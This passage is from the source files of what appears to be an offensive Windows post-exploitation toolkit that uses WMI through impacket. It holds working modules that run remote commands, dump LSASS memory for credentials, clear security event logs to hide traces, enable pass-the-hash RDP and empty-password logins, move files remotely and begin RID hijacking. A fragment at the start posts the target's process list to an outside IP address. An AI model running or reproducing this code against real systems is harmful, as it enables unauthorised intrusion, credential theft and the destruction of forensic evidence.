tmp=[] 10 | result="" 11 | url="http://42.193.251.15/tasklist.php" 12 | headers={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36","Content-Type":"application/x-www-form-urlencoded"} 13 | rqt=requests.post(url=url,headers=headers,data="avlist={}".format(urllib.parse.quote(processlist)),verify=False) 14 | html=BeautifulSoup(rqt.text,"html.parser") 15 | tdlist=html.find_all("td") 16 | for td in tdlist: 17 | tmp.append(td.get_text()) 18 | if len(tmp)==2: 19 | find_pid=re.findall("{}.*".format(tmp[0]),processlist) 20 | pid=find_pid[0].split(" ")[1] 21 | result += "{} {} PID:{}\r\n".format(tmp[0], tmp[1],pid) 22 | tmp=[] 23 | print(result) -------------------------------------------------------------------------------- /module/checkError.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | import logging 3 | def checkError(banner, resp): 4 | call_status = resp.GetCallStatus(0) & 0xffffffff # interpret as unsigned 5 | if call_status != 0: 6 | from impacket.dcerpc.v5.dcom.wmi import WBEMSTATUS 7 | try: 8 | error_name = WBEMSTATUS.enumItems(call_status).name 9 | except ValueError: 10 | error_name = 'Unknown' 11 | logging.error('%s - ERROR: %s (0x%08x)' % (banner, error_name, call_status)) 12 | else: 13 | logging.info('%s - OK' % banner) 14 | -------------------------------------------------------------------------------- /module/clearEventLog.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | from module import wmiconnect 3 | from module import vbsrun 4 | from module import checkError 5 | import time 6 | import os 7 | import uuid 8 | from io import StringIO 9 | 10 | def clear(ip='', username='', password='',domain='',hashes='',aesKey='',logname='',id=''): 11 | lognamelist=["application","system","setup","forwardedevents","security"] 12 | if logname.lower()=="all": 13 | for log_ in lognamelist: 14 | clear(ip, username, password, domain, hashes, aesKey,log_) 15 | return 0 16 | if logname.lower() in lognamelist: 17 | logname=logname 18 | else: 19 | print("[-] Not Found LogName:{}".format(logname)) 20 | return 1 21 | print("[*] clear eventlog:{}".format(logname)) 22 | print("Sleep 10s.....") 23 | temp=open(os.path.join(os.getcwd(), "vbs", "clearEventLog.vbs"),"r",encoding="utf-8").read().replace("AAAAAAAAAAAAAAAAAAAAAAAAAAA",logname) 24 | open(os.path.join(os.getcwd(), "output", "clearEventLog.vbs"),"w").write(temp) 25 | vbspath = os.path.join(os.getcwd(), "output", "clearEventLog.vbs") 26 | if id==None: 27 | vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey, vbspath) 28 | time.sleep(10) 29 | vbsrun.delete(ip, username, password, domain, hashes, aesKey, "Example") 30 | else: 31 | uid = str(uuid.uuid1()) 32 | print("[*] the run vbs to uuid:{}".format(uid)) 33 | print("To stop use --stop_vbs_id ") 34 | vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey, vbspath,vbsid=uid) 35 | time.sleep(3) 36 | -------------------------------------------------------------------------------- /module/cleartrace.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | from module import wmiconnect 3 | from module import vbsrun 4 | from module import clearEventLog 5 | import os 6 | import time 7 | 8 | def cleartrace(ip='', username='', password='',domain='',hashes='',aesKey=''): 9 | vbspath=os.path.join(os.getcwd(),"vbs","cleartrace.vbs") 10 | vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey,vbspath) 11 | print("[*] sleep 3 On cycle clearEventLog Security") 12 | time.sleep(3) 13 | clearEventLog.clear(ip, username, password, domain, hashes, aesKey,"Security",id=True) -------------------------------------------------------------------------------- /module/cmdrun.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | from module import wmiconnect 3 | from module import vbsrun 4 | from module import checkError 5 | import chardet 6 | import time 7 | import sys 8 | import datetime 9 | import base64 10 | import uuid 11 | import os 12 | from io import StringIO 13 | 14 | ''' 15 | 这个命令执行写了很久,遇见了好几个bug...最好决定通过利用vbs创建类然后把命令执行结果base64编码然后写进去 16 | 在取回来解码,因为Win32_ScheduledJob一些命令可能需要1分钟来执行,所以通过一直判断是否存在创建的类来判断 17 | 命令执行是否已经完成,这里问过xiaoli师傅,他说功能最好全部用vbs来实现。。但是考虑到vbs可能会重复执行决定分开来写 18 | (有一部分原因是因为懒的改) 19 | 20 | vbs base64编码用的纯算法实现(抄来的) 21 | 22 | 剩下的两个bug: 23 | 1.命令参数传入dir C:\\Users\\会变成-> C:\\\\Users\\ 24 | 2.执行wmic os这类命令不能正确解码,不知道是不是vbs的问题 25 | ''' 26 | 27 | def exec_command(ip, username, password, domain, hashes, aesKey,cmd): 28 | dcom, iWbemLevel1Login =wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 29 | iWbemLevel1Login.RemRelease() 30 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) 31 | 32 | sql1 = "SELECT * FROM Win32_LocalTime" 33 | sql2 = "SELECT * FROM Win32_TimeZone" 34 | sql1_query=iWbemServices.ExecQuery(sql1) 35 | pEnum = sql1_query.Next(0xffffffff, 1)[0] 36 | Hour=int(pEnum.Hour) 37 | Minute=int(pEnum.Minute) 38 | Second=int(pEnum.Second) 39 | Machine_Date = datetime.datetime(100,1,1,Hour,Minute,Second) 40 | execute_time = Machine_Date + datetime.timedelta(0, 60) #加一分钟 41 | exectime=execute_time.time() 42 | sql2_query=iWbemServices.ExecQuery(sql2) 43 | pEnum = sql2_query.Next(0xffffffff, 1)[0] 44 | bias=str(pEnum.Bias) 45 | executeTime = "********" + str(exectime).replace(":", '') + ".000000+" + str(bias) 46 | print("[*] operation hours:{}".format(executeTime)) 47 | 48 | #print(sql1_query) 49 | uid=str(uuid.uuid1()) 50 | outfile="C:\\Windows\\Temp\\{}.txt".format(uid) 51 | command="C:\Windows\System32\cmd.exe /c \"{}\" > {}".format(cmd,outfile) 52 | print("[*] run command:") 53 | print(outfile) 54 | print(command) 55 | print("CIM_DataFile.Name=\"{}\"".format(outfile.replace("\\","\\\\"))) 56 | Win32_ScheduledJob,resp=iWbemServices.GetObject("Win32_ScheduledJob") 57 | create=Win32_ScheduledJob.Create(command,executeTime,False,0,0,True) 58 | if int(create.ReturnValue)==0: 59 | print("[*] Runn command create sucess") 60 | ''' 61 | tmp=None 62 | while True: 63 | try: 64 | CIM_DataFile,_=iWbemServices.GetObject("CIM_DataFile.Name=\"{}\"".format(outfile.replace("\\","\\\\"))) 65 | if CIM_DataFile.FileSize!=tmp and tmp!=None: 66 | break 67 | else: 68 | print(CIM_DataFile.FileSize,end="",flush=True) 69 | # if tmp!=file_Status: 70 | # print(file_Status) 71 | tmp = CIM_DataFile.FileSize 72 | # print(CIM_DataFile.FileSize) 73 | #break 74 | except Exception as error: 75 | if "WBEM_E_INVALID_QUERY" in str(error): 76 | pass 77 | elif "WBEM_E_NOT_FOUND" in str(error): 78 | pass 79 | else: 80 | print(error) 81 | ''' 82 | 83 | else: 84 | print("[-] Exec Command Failure") 85 | 86 | #time.sleep(1) 87 | #避免缓存 88 | read_executecommand_output_vbs_path=os.path.join(os.getcwd(),"output","exec_command_read.vbs") 89 | tmpvbsdata=open(os.path.join(os.getcwd(), "vbs", "exec_command_read.vbs"),"r",encoding="utf-8").read().replace("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",outfile).replace("BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB",uid) 90 | open(read_executecommand_output_vbs_path,"w",encoding="utf-8") 91 | print(tmpvbsdata,file=open(read_executecommand_output_vbs_path,"a",encoding="utf-8")) 92 | vbspath=read_executecommand_output_vbs_path 93 | # current = sys.stdout 94 | # sys.stdout = StringIO() 95 | vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey, vbspath) 96 | # sys.stdout = current 97 | dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 98 | iWbemLevel1Login.RemRelease() 99 | iWbemServices2 = iWbemLevel1Login.NTLMLogin('//./root/subscription', NULL, NULL) 100 | while True: 101 | try: 102 | readscript, _ = iWbemServices2.GetObject('ActiveScriptEventConsumer.Name="{}"'.format(uid)) 103 | break 104 | except Exception as error: 105 | if "WBEM_E_NOT_FOUND" in str(error): 106 | pass 107 | else: 108 | print(error) 109 | cmdoutput=readscript.ScriptText 110 | if len(cmdoutput)>0: 111 | try: 112 | decodetext=base64.b64decode(cmdoutput).decode("utf-8") 113 | except: 114 | print("[-] utf-8 decode Failure") 115 | decodetext=base64.b64decode(cmdoutput).replace(b"\x00",b"") 116 | else: 117 | decodetext="" 118 | # dcom.disconnect() 119 | print("------------------------------------------------Result------------------------------------------------") 120 | print(decodetext) 121 | checkError.checkError('Removing ActiveScriptEventConsumer %s' % uid, 122 | iWbemServices2.DeleteInstance('ActiveScriptEventConsumer.Name="%s"' % uid)) 123 | vbsrun.delete(ip, username, password, domain, hashes, aesKey, "Example") 124 | tmp2=open(os.path.join(os.getcwd(), "vbs", "dele_file.vbs"),"r",encoding="utf-8").read().replace("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",outfile) 125 | #delete command output file 126 | dele_output_vbs_path = os.path.join(os.getcwd(), "output", "dele_file.vbs") 127 | open(dele_output_vbs_path,"w",encoding="utf-8") 128 | print(tmp2,file=open(dele_output_vbs_path,"a",encoding="utf-8")) 129 | vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey, dele_output_vbs_path) 130 | time.sleep(2.5) 131 | vbsrun.delete(ip, username, password, domain, hashes, aesKey, "Example") 132 | return decodetext -------------------------------------------------------------------------------- /module/cmdrun2.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | from module import wmiconnect 3 | from module import checkError 4 | from module import vbsrun 5 | import os 6 | import uuid 7 | import time 8 | import re 9 | import base64 10 | 11 | def execcmd(ip, username, password, domain, hashes, aesKey,cmd,types="",current_path=""): 12 | print("[*] vbs schtasks run command") 13 | uid=str(uuid.uuid1()) 14 | uid2=str(uuid.uuid1()) 15 | print("[*] ouput command to file:C:\\Windows\\Temp\\{}.txt".format(uid)) 16 | format_vbs=os.path.join(os.getcwd(),"vbs","exec2_command.vbs") 17 | if types=="fake_shell": 18 | tmpdata = open(format_vbs, "r",encoding="utf-8").read() 19 | cmd_format = r'''Action.arguments = chr(34) & "/c cd /d PATH_REPLACE&AAAAAAAAAAAA >> C:\Windows\Temp\BBBBBBBBBBB 2>C:\Windows\Temp\DDDDDDDDDDer_.txt&echo [S] >> C:\Windows\Temp\BBBBBBBBBBB&cd >> C:\Windows\Temp\BBBBBBBBBBB&echo [E] >> C:\Windows\Temp\BBBBBBBBBBB" & chr(34) ''' 20 | th = re.search("Action.arguments = .*", tmpdata) 21 | tmp = tmpdata.replace(th.group(), cmd_format.replace("PATH_REPLACE","\" & Base64Decode(\"{}\") & \"".format(base64.b64encode(current_path.encode()).decode())).replace("AAAAAAAAAAAA","\" & Base64Decode(\"{}\") & \"".format(base64.b64encode(cmd.encode()).decode())).replace("BBBBBBBBBBB",uid+".txt").replace("CCCCCCCCCCCCC",uid).replace("DDDDDDDDDD",uid)).replace("BBBBBBBBBBB",uid+".txt").replace("CCCCCCCCCCCCC",uid).replace("DDDDDDDDDD",uid) 22 | else: 23 | tmp=open(format_vbs,"r",encoding="utf-8").read().replace("AAAAAAAAAAAA",cmd).replace("BBBBBBBBBBB",uid+".txt").replace("CCCCCCCCCCCCC",uid).replace("DDDDDDDDDD",uid) 24 | exec_vbs_path = os.path.join(os.getcwd(), "output", "exec2_command.vbs") 25 | outputvbs=open(exec_vbs_path,"w",encoding="utf-8") 26 | outputvbs.write(tmp) 27 | outputvbs.close() 28 | vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey,exec_vbs_path,uid2) 29 | dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 30 | # iWbemLevel1Login.RemRelease() 31 | iWbemServices2 = iWbemLevel1Login.NTLMLogin('//./root/subscription', NULL, NULL) 32 | 33 | while True: 34 | try: 35 | readscript, _ = iWbemServices2.GetObject('ActiveScriptEventConsumer.Name="{}"'.format(uid)) 36 | break 37 | except Exception as error: 38 | if "WBEM_E_NOT_FOUND" in str(error): 39 | pass 40 | else: 41 | print(error) 42 | cmdoutput = readscript.ScriptText 43 | 44 | if len(cmdoutput) > 0: 45 | try: 46 | decodetext = base64.b64decode(cmdoutput).decode("utf-8") 47 | except: 48 | print("[-] utf-8 decode Failure") 49 | decodetext = base64.b64decode(cmdoutput).replace(b"\x00", b"") 50 | else: 51 | decodetext = "" 52 | # dcom.disconnect() 53 | print("------------------------------------------------Result------------------------------------------------") 54 | print(decodetext) 55 | vbsrun.delete(ip, username, password, domain, hashes, aesKey,uid2) 56 | dele_output_vbs_path = os.path.join(os.getcwd(), "output", "dele_file.vbs") 57 | tmp2 = open(os.path.join(os.getcwd(), "vbs", "dele_file.vbs"), "r", encoding="utf-8").read().replace("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", "C:\\Windows\\Temp\\{}".format(uid+".txt")).replace("DDDDDDDDDD",uid) 58 | open(dele_output_vbs_path, "w", encoding="utf-8") 59 | print(tmp2, file=open(dele_output_vbs_path, "a", encoding="utf-8")) 60 | vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey, dele_output_vbs_path) 61 | #延时等待命令执行结果输出的文件全部删除 62 | #time.sleep(2.5) 63 | vbsrun.delete(ip, username, password, domain, hashes, aesKey, "Example") 64 | return decodetext -------------------------------------------------------------------------------- /module/dumpLsass.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | from module import wmiconnect 3 | from module import cmdrun 4 | 5 | def dump_lsass(ip='', username='', password='',domain='',hashes='',aesKey=''): 6 | print("[*] Query Lsass PID") 7 | dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 8 | iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL) 9 | iWbemLevel1Login.RemRelease() 10 | win32Process, _ = iWbemServices.GetObject("Win32_Process") 11 | iEnumWbemClassObject = iWbemServices.ExecQuery("select * from Win32_Process where Name=\"lsass.exe\"") 12 | iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff, 1)[0] 13 | lsass_pid=iWbemClassObject.Handle 14 | print("[*] the lsass PID:{}".format(lsass_pid)) 15 | cmd=r"rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump {} lsass.dmp full&&dir C:\windows\System32\lsass.dmp".format(lsass_pid) 16 | cmdrun.exec_command(ip, username, password, domain, hashes,aesKey,cmd) 17 | 18 | -------------------------------------------------------------------------------- /module/enable_pth_login_rdp.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | from module import wmiconnect 3 | 4 | def enable_pth_login_rdp(ip='', username='', password='',domain='',hashes='',aesKey='',isenable=0): 5 | if int(isenable)!=1 and int(isenable)!=0: 6 | print("[-] Pluse Query Help,Thanks....") 7 | exit() 8 | print("[*] Enable/disable pth login rdp") 9 | dcom,iWbemLevel1Login=wmiconnect.wmiconnect(ip,username,password,domain,hashes,aesKey) 10 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) 11 | StdRegProv, resp = iWbemServices.GetObject("StdRegProv") 12 | 13 | if int(isenable)==1: 14 | pth_open=StdRegProv.SetDWORDValue(2147483650,"System\\CurrentControlSet\\Control\\Lsa","DisableRestrictedAdmin",0) 15 | if pth_open.ReturnValue==0: 16 | print("[+] Enable PTH Rdp Login Sucess") 17 | else: 18 | pth_open = StdRegProv.DeleteValue(2147483650, "System\\CurrentControlSet\\Control\\Lsa","DisableRestrictedAdmin") 19 | if pth_open.ReturnValue == 0: 20 | print("[+] Disable PTH Rdp Login Sucess") 21 | dcom.disconnect() -------------------------------------------------------------------------------- /module/files.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | from module import wmiconnect 3 | from module import vbsrun 4 | from io import StringIO 5 | import uuid 6 | import os 7 | import sys 8 | import base64 9 | import binascii 10 | import time 11 | 12 | def readfile(ip='', username='', password='',domain='',hashes='',aesKey='',targetfile='',savetofile=''): 13 | teamplevbs_path=os.path.join(os.getcwd(),"vbs","readfile.vbs") 14 | outputvbs_path=os.path.join(os.getcwd(),"output","readfile.vbs") 15 | uid=str(uuid.uuid1()) 16 | vbsid=str(uuid.uuid1()) 17 | remote_filepath_notfound_id="UmFpZEVuTWVpOllvdSBhcmUgcHJvbXB0ZWQgdGhhdCB0aGUgZmlsZSBkb2VzIG5vdCBleGlzdA==" 18 | print("[*] ip:{}@{} -> {}".format(ip,targetfile,savetofile)) 19 | tmp=open(teamplevbs_path,"r",encoding="utf-8").read().replace("AAAAAAAAAAAAAAAAAAAAA",base64.b64encode(targetfile.encode()).decode()).replace("BBBBBBBBBBBBBBBBBBBBBBB",uid) 20 | newfile=open(outputvbs_path,"w",encoding="utf-8") 21 | newfile.write(tmp) 22 | newfile.close() 23 | vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey, outputvbs_path, vbsid) 24 | dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 25 | iWbemLevel1Login.RemRelease() 26 | iWbemServices2 = iWbemLevel1Login.NTLMLogin('//./root/subscription', NULL, NULL) 27 | # while死循环判断vbs不用写文件判断,爽 28 | while True: 29 | try: 30 | readscript, _ = iWbemServices2.GetObject('ActiveScriptEventConsumer.Name="{}"'.format(uid)) 31 | break 32 | except Exception as error: 33 | if "WBEM_E_NOT_FOUND" in str(error): 34 | pass 35 | else: 36 | print(error) 37 | fileodata = base64.b64decode(readscript.ScriptText) 38 | if readscript.ScriptText==remote_filepath_notfound_id: 39 | print(fileodata.decode()) 40 | else: 41 | print("[*] filedat size:{}".format(len(fileodata))) 42 | wb=open(savetofile,"wb") 43 | wb.write(fileodata) 44 | wb.close() 45 | print("[+] save to file sucess") 46 | vbsrun.delete(ip, username, password, domain, hashes, aesKey,vbsid) 47 | 48 | 49 | def WriteFile(ip, username, password, domain, hashes, aesKey,targetfile,savetofile): 50 | if os.path.exists(targetfile)==False: 51 | print("[-] File:{} Not Found".format(targetfile)) 52 | exit() 53 | print("[*] upload file:{} -> save to filepath:{}".format(targetfile,savetofile)) 54 | filedata=binascii.hexlify(open(targetfile,"rb").read()).decode() 55 | vbsid=str(uuid.uuid1()) 56 | teamplevbs=os.path.join(os.getcwd(),"vbs","writeFile.vbs") 57 | outfilevbs=os.path.join(os.getcwd(),"output","writeFile.vbs") 58 | tmp=open(teamplevbs,"r",encoding="utf-8").read().replace("AAAAAAAAAAAAAAAAAAAAAAAAA",filedata).replace("BBBBBBBBBBBBBBBBBBBBBBB",base64.b64encode(savetofile.encode()).decode()) 59 | newfile=open(outfilevbs,"w",encoding="utf-8") 60 | newfile.write(tmp) 61 | newfile.close() 62 | #想这种vbs调用组件IO写文件,拥有阻塞性,执行如果没执行完的话会一直阻塞,相当于变向判断了文件是否成功写入(大文件可以,小文件翻车,重复不行,还是延迟,操) 63 | 64 | current = sys.stdout 65 | sys.stdout = StringIO() 66 | vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey,outfilevbs,vbsid) 67 | sys.stdout=current 68 | time.sleep(2.5) 69 | vbsrun.delete(ip, username, password, domain, hashes, aesKey,vbsid) 70 | print("[*] write file vbs run Finish") 71 | 72 | def deletefile(ip, username, password, domain, hashes, aesKey,targetfile): 73 | teamplevbs_path = os.path.join(os.getcwd(), "vbs", "delete_file.vbs") 74 | outputvbs_path = os.path.join(os.getcwd(), "output", "delete_file.vbs") 75 | vbsid = str(uuid.uuid1()) 76 | temp=open(teamplevbs_path,"r",encoding="utf-8").read() 77 | temp=temp.replace("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", base64.b64encode(targetfile.encode()).decode()) 78 | newfile = open(outputvbs_path, "w", encoding="utf-8") 79 | newfile.write(temp) 80 | newfile.close() 81 | vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey, outputvbs_path, vbsid) 82 | time.sleep(2.5) 83 | vbsrun.delete(ip, username, password, domain, hashes, aesKey, vbsid) 84 | print("[*] Delete file:{} sucess".format(targetfile)) -------------------------------------------------------------------------------- /module/getProcessList.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | from module import wmiconnect 3 | from module import printReply 4 | import time 5 | def getProcessList(ip='', username='', password='',domain='',hashes='',aesKey='',query=False): 6 | print("[*] Get Process List") 7 | result_echoformat="" 8 | dcom,iWbemLevel1Login=wmiconnect.wmiconnect(ip,username,password,domain,hashes,aesKey) 9 | iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL) 10 | iWbemLevel1Login.RemRelease() 11 | win32Process, _ = iWbemServices.GetObject("Win32_Process") 12 | ProcessList = iWbemServices.ExecQuery("SELECT * from Win32_Process") 13 | process_result = printReply.printReply(ProcessList) 14 | split_process_result=process_result.split("\n") 15 | for process in range(1,len(process_result)): 16 | try: 17 | fg_process=split_process_result[process].split("|") 18 | processname=fg_process[1].lstrip().rstrip() 19 | create_process_time=time.strftime("%Y-%m-%d-%H:%M:%S",time.strptime(fg_process[9].split(".")[0].lstrip().rstrip(),"%Y%m%d%H%M%S")) 20 | processpid=fg_process[10].lstrip().rstrip() 21 | commandline=fg_process[-2].lstrip().rstrip() 22 | echoformat="{} {} {} {}".format(processname,processpid,commandline,create_process_time) 23 | result_echoformat+=echoformat+"\r\n" 24 | print(echoformat) 25 | 26 | except Exception as error: 27 | pass 28 | 29 | if query == True: 30 | print("========================================TASKLIST QUERY====================================================") 31 | print() 32 | from module import check 33 | check.process_check(result_echoformat) 34 | dcom.disconnect() -------------------------------------------------------------------------------- /module/listdir.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | from module import wmiconnect 3 | from module import vbsrun 4 | import uuid 5 | import base64 6 | import os 7 | 8 | def ls(ip='', username='', password='',domain='',hashes='',aesKey='',targetpath=''): 9 | vbs_teample_path=os.path.join(os.getcwd(),"vbs","listdir.vbs") 10 | output_vbs_path=os.path.join(os.getcwd(),"output","listdir.vbs") 11 | uid=str(uuid.uuid1()) 12 | vbsid=str(uuid.uuid1()) 13 | temp=open(vbs_teample_path,"r",encoding="utf-8").read().replace("AAAAAAAAAAAAAAAAAAAA",base64.b64encode(targetpath.encode()).decode()).replace("BBBBBBBBBBBBBBBBBBBBBBB",uid) 14 | newfile = open(output_vbs_path, "w", encoding="utf-8") 15 | newfile.write(temp) 16 | newfile.close() 17 | vbsrun.run_vbs(ip, username, password, domain, hashes, aesKey, output_vbs_path, vbsid) 18 | dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 19 | iWbemLevel1Login.RemRelease() 20 | iWbemServices2 = iWbemLevel1Login.NTLMLogin('//./root/subscription', NULL, NULL) 21 | # while死循环判断vbs不用写文件判断,爽 22 | while True: 23 | try: 24 | readscript, _ = iWbemServices2.GetObject('ActiveScriptEventConsumer.Name="{}"'.format(uid)) 25 | break 26 | except Exception as error: 27 | if "WBEM_E_NOT_FOUND" in str(error): 28 | pass 29 | else: 30 | print(error) 31 | fileodata = base64.b64decode(readscript.ScriptText).decode() 32 | print("==============================={}===============================".format(targetpath)) 33 | print(fileodata) 34 | vbsrun.delete(ip, username, password, domain, hashes, aesKey,vbsid) -------------------------------------------------------------------------------- /module/printReply.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | import sys 3 | import logging 4 | from io import StringIO 5 | def printReply(iEnum): 6 | current=sys.stdout 7 | sys.stdout = StringIO() 8 | printHeader = True 9 | while True: 10 | try: 11 | pEnum = iEnum.Next(0xffffffff, 1)[0] 12 | record = pEnum.getProperties() 13 | if printHeader is True: 14 | print('|', end=' ') 15 | for col in record: 16 | print('%s |' % col, end=' ') 17 | print() 18 | printHeader = False 19 | print('|', end=' ') 20 | for key in record: 21 | if type(record[key]['value']) is list: 22 | for item in record[key]['value']: 23 | print(item, end=' ') 24 | print(' |', end=' ') 25 | else: 26 | print('%s |' % record[key]['value'], end=' ') 27 | print() 28 | except Exception as e: 29 | if logging.getLogger().level == logging.DEBUG: 30 | import traceback 31 | traceback.print_exc() 32 | sys.exit(1) 33 | if str(e).find('S_FALSE') < 0: 34 | raise 35 | else: 36 | break 37 | 38 | result=sys.stdout.getvalue() 39 | sys.stdout = current 40 | return result 41 | iEnum.RemRelease() 42 | sys.stdout=current -------------------------------------------------------------------------------- /module/rdpsetting.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | from module import wmiconnect 3 | 4 | def enablerdp(ip='', username='', password='',domain='',hashes='',aesKey='',isenable=0): 5 | if int(isenable)==2: #偷懒 6 | dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 7 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) 8 | StdRegProv, resp = iWbemServices.GetObject("StdRegProv") 9 | rdpport = StdRegProv.GetDWORDValue(2147483650, 10 | "SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp", 11 | "PortNumber") 12 | print("[*] RDP Port:{}".format(rdpport.uValue)) 13 | dcom.disconnect() 14 | exit() 15 | if int(isenable)!=1 and int(isenable)!=0: 16 | print("[-] Pluse Query Help,Thanks....") 17 | exit() 18 | 19 | print("[*] Enable/Disable RDP") 20 | dcom,iWbemLevel1Login=wmiconnect.wmiconnect(ip,username,password,domain,hashes,aesKey) 21 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2/TerminalServices', NULL, NULL) 22 | iWbemServices.get_dce_rpc().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY) 23 | iWbemLevel1Login.RemRelease() 24 | WQL = r"""SELECT * FROM Win32_TerminalServiceSetting""" 25 | iEnumWbemClassObject = iWbemServices.ExecQuery(WQL) 26 | iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff, 1)[0] 27 | if int(isenable)==1: 28 | iWbemClassObject.SetAllowTSConnections(1, 1) #Enable RDP 29 | else: 30 | iWbemClassObject.SetAllowTSConnections(0, 0) # Disable RDP 31 | 32 | iEnumWbemClassObject = iWbemServices.ExecQuery(WQL) 33 | iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff, 1)[0] 34 | result = dict(iWbemClassObject.getProperties()) 35 | if result['AllowTSConnections']['value']==1: 36 | print("[+] Enable RDP Open Sucess") 37 | elif result['AllowTSConnections']['value']==0: 38 | print("[+] Disable RDP Sucess") 39 | iWbemServices.RemRelease() 40 | 41 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) 42 | StdRegProv, resp = iWbemServices.GetObject("StdRegProv") 43 | rdpport=StdRegProv.GetDWORDValue(2147483650,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp","PortNumber") 44 | print("[*] RDP Port:{}".format(rdpport.uValue)) 45 | dcom.disconnect() 46 | 47 | 48 | def rdpshadow(ip='', username='', password='',domain='',hashes='',aesKey='',shadow=0): 49 | idnumber=[-1,0,1,2,3,4] 50 | if shadow not in idnumber: 51 | print("[-] Shadow ID:0 or 1 or 2 or 3 or 4") 52 | exit() 53 | dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 54 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) 55 | StdRegProv, resp = iWbemServices.GetObject("StdRegProv") 56 | if shadow==-1: 57 | deleteshadow=StdRegProv.DeleteValue(2147483650, "Software\\Policies\\Microsoft\\Windows NT\\Terminal Services","Shadow") 58 | if deleteshadow.ReturnValue==0: 59 | print("[+] Delete Shadow reg key Sucess") 60 | else: 61 | shadowid = StdRegProv.SetDWORDValue(2147483650, "Software\\Policies\\Microsoft\\Windows NT\\Terminal Services","Shadow",shadow) 62 | print("[*] Set RDP Shdaow ID:{}".format(shadow)) 63 | if shadowid.ReturnValue==0: 64 | print("[+] Set RDP Shadow ID Sucess") 65 | else: 66 | print("[-] Set RDP Shadow ID Failure") 67 | dcom.disconnect() 68 | 69 | def Login_with_empty_password(ip='', username='', password='',domain='',hashes='',aesKey='',isenable=0): 70 | print("[*] Login with empty password Setting") 71 | dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 72 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) 73 | StdRegProv, resp = iWbemServices.GetObject("StdRegProv") 74 | if isenable==0: 75 | txt="Enable Login with empty password" 76 | limitblankpassworduse = StdRegProv.SetDWORDValue(2147483650, "SYSTEM\\CurrentControlSet\\Control\\Lsa", "limitblankpassworduse",0) 77 | else: 78 | txt="Disable Login with empty password" 79 | limitblankpassworduse = StdRegProv.SetDWORDValue(2147483650, "SYSTEM\\CurrentControlSet\\Control\\Lsa","limitblankpassworduse", 1) 80 | 81 | if limitblankpassworduse.ReturnValue==0: 82 | print("[+] {} Sucess".format(txt)) 83 | else: 84 | print("[-] {} Failure".format(txt)) 85 | dcom.disconnect() -------------------------------------------------------------------------------- /module/ridhijack.py: -------------------------------------------------------------------------------- 1 | import os 2 | import uuid 3 | import time 4 | from module import * 5 | from module import files 6 | from module import vbsrun 7 | from module import wmiconnect 8 | 9 | inipath=os.path.join(os.getcwd(),"output","regini.ini") 10 | def rid_teample_create(src_rid,target_rid,id=0): 11 | pass 12 | 13 | def hex_set(b,target_rid,isenable=0): 14 | tmp = [] 15 | result = [] 16 | for x in b: 17 | tmp.append(x) 18 | if len(tmp) == 4: 19 | jj = "" 20 | for c in tmp[::-1]: 21 | jj += "%.2x" % c 22 | result.append(eval("0x{}".format(jj))) 23 | tmp = [] 24 | for number in range(80 - len(result)): 25 | result.append(0) 26 | result[12]=eval("int(0x{})".format(target_rid)) #用户rid设置 27 | if 